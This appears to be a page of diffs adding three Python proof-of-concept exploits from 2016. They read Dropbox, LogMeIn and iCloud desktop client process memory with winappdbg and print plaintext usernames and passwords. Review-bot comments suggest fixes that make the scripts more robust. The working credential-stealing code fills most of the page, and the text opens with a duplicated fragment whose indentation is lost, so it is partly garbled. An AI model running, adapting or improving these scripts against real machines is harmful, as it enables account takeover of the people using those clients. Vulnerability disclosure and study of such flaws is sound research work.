print "[~] Trying to read memory for pid #%d" % (process_pid)
|
||||
|
||||
process = Process(process_pid)
|
||||
for address in process.search_bytes('\x88\x38\xB7\xAE\x73\x8C\x07\x00\x0A\x16'):
|
||||
memory_dump.append(process.read(address,50))
|
||||
|
||||
try:
|
||||
str = b2h(memory_dump[0]).split('88 38 B7 AE 73 8C 07 00 0A 16')[1]
|
||||
usr = h2b(str.split(' 00')[0])
|
||||
except:
|
||||
pass
|
||||
|
||||
memory_dump = []
|
||||
for address in process.search_bytes('\x65\x00\x88\x38\xB7\xAE\x73\x8C\x07\x00\x02\x09'):
|
||||
memory_dump.append(process.read(address,60))
|
||||
try:
|
||||
str = b2h(memory_dump[0]).split('07 00 02 09')[1]
|
||||
pwd = h2b(str.split(' 00')[0])
|
||||
except:
|
||||
pass
|
||||
|
||||
if usr != '' and pwd !='':
|
||||
found = 1
|
||||
print "[+] iCloud Credentials found!\r\n----------------------------------------"
|
||||
print "[+] Username: %s" % usr
|
||||
print "[+] Password: %s" % pwd
|
||||
if found == 0:
|
||||
print "[-] Credentials not found!"
|
||||
else:
|
||||
print "[-] No process found with name '%s'." % (filename)
|
||||
|
||||
debug.loop()
|
||||
finally:
|
||||
debug.stop()
|
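--- /dev/null
+++ b/platforms/windows/local/40348.py
@@ -0,0 +1,66 @@
+#####
+# Dropbox Desktop Client v9.4.49 (64bit) Local Credentials Disclosure
+# Tested on Windows Windows Server 2012 R2 64bit, English
+# Vendor Homepage @ https://www.dropbox.com
+# Date 06/09/2016
+# Bug Discovery by:
+#
+# Yakir Wizman (https://www.linkedin.com/in/yakirwizman)
+# http://www.black-rose.ml
+#
+# Viktor Minin (https://www.linkedin.com/in/MininViktor)
+# https://1-33-7.com/
+#
+# Alexander Korznikov (https://www.linkedin.com/in/nopernik)
+# http://korznikov.com/
+#
+#####
+# Dropbox Desktop Client v9.4.49 is vulnerable to local credentials disclosure, the supplied username and password are stored in a plaintext format in memory process.
+# A potential attacker could reveal the supplied username and password in order to gain access to account.
+#####
+# Proof-Of-Concept Code:
+
+import time
+import urllib
+from winappdbg import Debug, Process
+
+username = ''
+password = ''
+found = 0
+filename = "Dropbox.exe"
+process_pid = 0
+memory_dump = []
+
+debug = Debug()
+try:
+    print "[~] Searching for pid by process name '%s'.." % (filename)
+    time.sleep(1)
+    debug.system.scan_processes()
+    for (process, process_name) in debug.system.find_processes_by_filename(filename):
+        process_pid = process.get_pid()
+    if process_pid is not 0:
+        print "[+] Found process with pid #%d" % (process_pid)
+        time.sleep(1)
+        print "[~] Trying to read memory for pid #%d" % (process_pid)
+
+        process = Process(process_pid)
+        for address in process.search_bytes('\x26\x70\x61\x73\x73\x77\x6F\x72\x64\x3D'):
+            memory_dump.append(process.read(address,100))
+        for i in range(len(memory_dump)):
+            email_addr = memory_dump[i].split('email=')[1]
+            tmp_passwd = memory_dump[i].split('password=')[1]
+            username = email_addr.split('\x00')[0]
+            password = tmp_passwd.split('&is_sso_link=')[0]
+            if username != '' and password !='':
+                found = 1
+                print "[+] Credentials found!\r\n----------------------------------------"
+                print "[+] Username: %s" % urllib.unquote_plus(username)
+                print "[+] Password: %s" % password
+        if found == 0:
+            print "[-] Credentials not found! Make sure the client is connected."
+    else:
+        print "[-] No process found with name '%s'." % (filename)
+
+    debug.loop()
+finally:
+    debug.stop()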
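Review bot: `print "[+] Password: %s" % password` emits the raw form-encoded value while the line above decodes the username with `urllib.unquote_plus`, so a password containing `+`, `@`, `&` or `%` is displayed incorrectly; use `urllib.unquote_plus(password)` as well. `if process_pid is not 0:` compares an int by identity, which only works because CPython caches small ints and is flagged as a SyntaxWarning on newer interpreters; write `if process_pid != 0:`. Each `.split(...)[1]` assumes `email=` and `password=` both sit inside the 100-byte window read after the `&password=` match, and a match that lacks them raises an uncaught IndexError that aborts the whole scan instead of skipping that hit, so the loop body should be guarded with `try: ... except IndexError: continue`. The header's impact statement should also say that the reader must already run as the same user (or hold SeDebugPrivilege) to open Dropbox.exe for reading, since that is the real precondition of this disclosure. The page rendering drops the script's indentation, so the nesting of `if found == 0:` relative to the inner loop is inferred from the surrounding syntax.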
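--- a/platforms/windows/local/40349.py
+++ b/platforms/windows/local/40349.py
@@ -0,0 +1,67 @@
+#####
+# LogMeIn Client v1.3.2462 (64bit) Local Credentials Disclosure
+# Tested on Windows Windows Server 2012 R2 64bit, English
+# Vendor Homepage @ https://secure.logmein.com/home/en
+# Date 06/09/2016
+# Bug Discovery by:
+#
+# Alexander Korznikov (https://www.linkedin.com/in/nopernik)
+# http://korznikov.com/
+#
+# Viktor Minin (https://www.linkedin.com/in/MininViktor)
+# https://1-33-7.com/
+#
+# Yakir Wizman (https://www.linkedin.com/in/yakirwizman)
+# http://www.black-rose.ml
+#
+#####
+# LogMeIn Client v1.3.2462 is vulnerable to local credentials disclosure, the supplied username and password are stored in a plaintext format in memory process.
+# A potential attacker could reveal the supplied username and password in order to gain access to account and associated computers.
+#####
+# Proof-Of-Concept Code:
+
+import time
+import urllib
+from winappdbg import Debug, Process
+
+username = ''
+password = ''
+found = 0
+filename = "LMIIgnition.exe"
+process_pid = 0
+memory_dump = []
+
+debug = Debug()
+try:
+print "[~] Searching for pid by process name '%s'.." % (filename)
+time.sleep(1)
+debug.system.scan_processes()
+for (process, process_name) in debug.system.find_processes_by_filename(filename):
+process_pid = process.get_pid()
+if process_pid is not 0:
+print "[+] Found process with pid #%d" % (process_pid)
+time.sleep(1)
+print "[~] Trying to read memory for pid #%d" % (process_pid)
+
+process = Process(process_pid)
+for address in process.search_bytes('\x26\x5F\x5F\x56\x49\x45\x57\x53\x54\x41\x54\x45\x3D'):
+memory_dump.append(process.read(address,150))
+for i in range(len(memory_dump[0])):
+email_addr = memory_dump[i].split('email=')[1]
+tmp_passwd = memory_dump[i].split('password=')[1]
+username = email_addr.split('&hiddenEmail=')[0]
+password = tmp_passwd.split('&rememberMe=')[0]
+if username != '' and password !='':
+found = 1
+print "[+] Credentials found!\r\n----------------------------------------"
+print "[+] Username: %s" % urllib.unquote_plus(username)
+print "[+] Password: %s" % password
+break
+if found == 0:
+print "[-] Credentials not found! Make sure the client is connected."
+else:
+print "[-] No process found with name '%s'." % (filename)
+
+debug.loop()
+finally:
+debug.stop()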
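Review bot: The inner loop `for i in range(len(memory_dump[0])):` ranges over the byte length of the first 150-byte read rather than over the number of reads, so `memory_dump[i]` raises IndexError once `i` exceeds the dump count unless the `break` fires first, and `memory_dump[0]` itself raises when the search pattern is never found, bypassing the "Credentials not found" message. The sibling script earlier on this page uses `for i in range(len(memory_dump)):`; that form, or `for dump in memory_dump:`, is what is intended here. `if process_pid is not 0:` is an identity comparison on an int and should be `if process_pid != 0:`. Since this is a disclosure PoC, printing the recovered password in clear leaves it in console scrollback and session logs; masking it in the output (e.g. `password[:2] + '*' * (len(password) - 2)`) demonstrates the finding equally well.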
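--- a/platforms/windows/local/40350.py
+++ b/platforms/windows/local/40350.py
@@ -0,0 +1,99 @@
+#####
+# Apple iCloud Desktop Client v5.2.1.0 Local Credentials Disclosure After Sign Out Exploit
+# Tested on Windows Windows 7 64bit, English
+# Vendor Homepage @ https://www.apple.com/
+# Product Homepage @ https://support.apple.com/en-us/HT204283
+# Date 07/09/2016
+# Bug Discovery by:
+#
+# Yakir Wizman (https://www.linkedin.com/in/yakirwizman)
+# http://www.black-rose.ml
+#
+# Viktor Minin (https://www.linkedin.com/in/MininViktor)
+# https://1-33-7.com/
+#
+# Alexander Korznikov (https://www.linkedin.com/in/nopernik)
+# http://korznikov.com/
+#
+#####
+# Apple iCloud Desktop Client v5.2.1.0 is vulnerable to local credentials disclosure after the user is logged out.
+# It seems that iCloud does not store the supplied credentials while the user is logged in, but after sign out the supplied username and password are stored in a plaintext format in memory process.
+# Funny eh?!
+# A potential attacker could reveal the supplied username and password in order to gain access to iCloud account.
+#
+# Authors are not responsible for any misuse or demage which caused by use of this script code.
+# Please use responsibly.
+#####
+# Proof-Of-Concept Code:
+
+import time
+import urllib
+from winappdbg import Debug, Process
+
+def b2h(str):
+return ''.join(["%02X " % ord(x) for x in str]).strip()
+
+def h2b(str):
+bytes = []
+str = ''.join(str.split(" "))
+for i in range(0, len(str), 2):
+bytes.append(chr(int(str[i:i+2], 16)))
+return ''.join(bytes)
+
+usr = ''
+pwd = ''
+found = 0
+filename = "iCloud.exe"
+process_pid = 0
+memory_dump = []
+
+debug = Debug()
+try:
+print "#########################################################################"
+print "#\tApple iCloud v5.2.1.0 Local Credentials Disclosure Exploit\t#"
+print "# Bug Discovery by Yakir Wizman, Victor Minin, Alexander Korznikov\t#"
+print "#\t\tTested on Windows Windows 7 64bit, English\t\t#"
+print "#\t\t\tPlease use responsibly.\t\t\t\t#"
+print "#########################################################################\r\n"
+print "[~] Searching for pid by process name '%s'.." % (filename)
+time.sleep(1)
+debug.system.scan_processes()
+for (process, process_name) in debug.system.find_processes_by_filename(filename):
+process_pid = process.get_pid()
+if process_pid is not 0:
+print "[+] Found process with pid #%d" % (process_pid)
+time.sleep(1)
+print "[~] Trying to read memory for pid #%d" % (process_pid)
+
+process = Process(process_pid)
+for address in process.search_bytes('\x88\x38\xB7\xAE\x73\x8C\x07\x00\x0A\x16'):
+memory_dump.append(process.read(address,50))
+
+try:
+str = b2h(memory_dump[0]).split('88 38 B7 AE 73 8C 07 00 0A 16')[1]
+usr = h2b(str.split(' 00')[0])
+except:
+pass
+
+memory_dump = []
+for address in process.search_bytes('\x65\x00\x88\x38\xB7\xAE\x73\x8C\x07\x00\x02\x09'):
+memory_dump.append(process.read(address,60))
+try:
+str = b2h(memory_dump[0]).split('07 00 02 09')[1]
+pwd = h2b(str.split(' 00')[0])
+except:
+pass
+
+if usr != '' and pwd !='':
+found = 1
+print "[+] iCloud Credentials found!\r\n----------------------------------------"
+print "[+] Username: %s" % usr
+print "[+] Password: %s" % pwd
+if found == 0:
+print "[-] Credentials not found!"
+else:
+print "[-] No process found with name '%s'." % (filename)
+
+debug.loop()
+finally:
+debug.stop()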
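Review bot: The two bare `except: pass` blocks around `str = b2h(memory_dump[0])...` swallow every exception, including the IndexError raised when `memory_dump` is empty or the marker is absent, so a failed read is indistinguishable from a genuine "not found" and any defect in `b2h`/`h2b` is hidden; narrowing them to `except IndexError:` and reporting which marker was not located keeps the best-effort behaviour while making failures visible. `def b2h(str):`, `def h2b(str):` and the module-level `str = ...` assignments shadow the builtin `str` (and `bytes` inside `h2b`), which breaks any later `str()` call in the same scope; renaming to `data` and `hexdump` is enough. `if process_pid is not 0:` is an identity comparison and should be `if process_pid != 0:`. As in the earlier script, the recovered password is printed in clear, which leaves it in console scrollback and logs; masking all but the first characters in the output still demonstrates the disclosure.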